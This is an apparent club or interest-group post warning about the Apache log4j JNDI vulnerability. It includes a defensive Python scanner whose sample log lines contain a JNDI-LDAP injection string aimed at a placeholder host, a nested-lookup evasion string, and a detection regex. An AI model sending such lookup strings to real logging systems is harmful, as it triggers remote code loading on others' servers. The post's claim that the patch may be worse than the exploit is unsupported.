A LOT of coverage in news outlets about "worst vulnerability ever", "Internet on fire", and similar stories.
We will cover the details in the Cyber Security SIG meeting December 16 at 3pm via zoom. The session/presentation will be audio recorded so view the posted presentation notes if you want the details - as they become more known.
The vulnerability is in the Apache log4j library. Most applications are developed then deployed using stock libraries for common functions. Logging is a common function and the Apache log4j library is a very popular application inclusion.
Very popular.
Thus it turns up in server applications, client applications, browsers, and social media platforms - to name a few.
So applications using Java include the log4j class, set parameters, and use the log4j library to handle application logging.
Some detail: The Java Naming and Directory Interface (JNDI) provides naming and directory functions to Java applications. So an application needs/wants to log something - anything. If the API encounters a JNDI reference in the logged text, the API will go to the supplied resource and fetch whatever it needs to resolve the requested variable. It is possible to download remote classes and execute them.
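Since the trigger is a lookup expression inside text that gets logged, one defensive check is to scan logged input for such expressions. The following is an added example for this post, not code from the original, run over constructed sample lines; the rule that a nested `${...}` lookup is unusual in legitimate input is an assumption of the example.

```python
import re

# Constructed sample log lines (not real traffic): one benign, one with an
# explicit JNDI lookup, one with a nested lookup that should also be reviewed.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET /login" 200 "${jndi:ldap://placeholder.invalid/a}"',
    '10.0.0.7 - - "GET /search?q=${${env:X}:test}" 200 "curl/7.0"',
]

# Case-insensitive match for the jndi lookup prefix inside a ${...} expression.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def extract_lookups(text):
    """Return every ${...} expression in text with its nesting depth.
    A small stack is used instead of a regex so nested braces are tracked."""
    lookups, stack = [], []
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()
            lookups.append((text[start:i + 1], len(stack)))
        i += 1
    return lookups


def classify(line):
    """'jndi' for an explicit JNDI lookup, 'nested' for a nested lookup
    (assumed unusual in legitimate input, so worth review), else 'clean'."""
    lookups = extract_lookups(line)
    if any(JNDI_RE.search(expr) for expr, _ in lookups):
        return "jndi"
    if any(depth > 0 for _, depth in lookups):
        return "nested"
    return "clean"


def scan(lines):
    """Return (verdict, line) for every line that is not clean."""
    return [(classify(l), l) for l in lines if classify(l) != "clean"]


if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LINES):
        print(verdict, line)
```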
A simple Proof of Concept (PoC) was released recently. Exploits rapidly increased in frequency and severity.
Any and everything may need an update.
Applications, sites, platforms, cloud services, Twitter, should be used with caution.
DHS and most national cyber agencies are issuing warnings. Please heed them.
UPDATE: The patch might be worse than the exploit.
VERY HEAVY scanning for vulnerable systems continues to increase.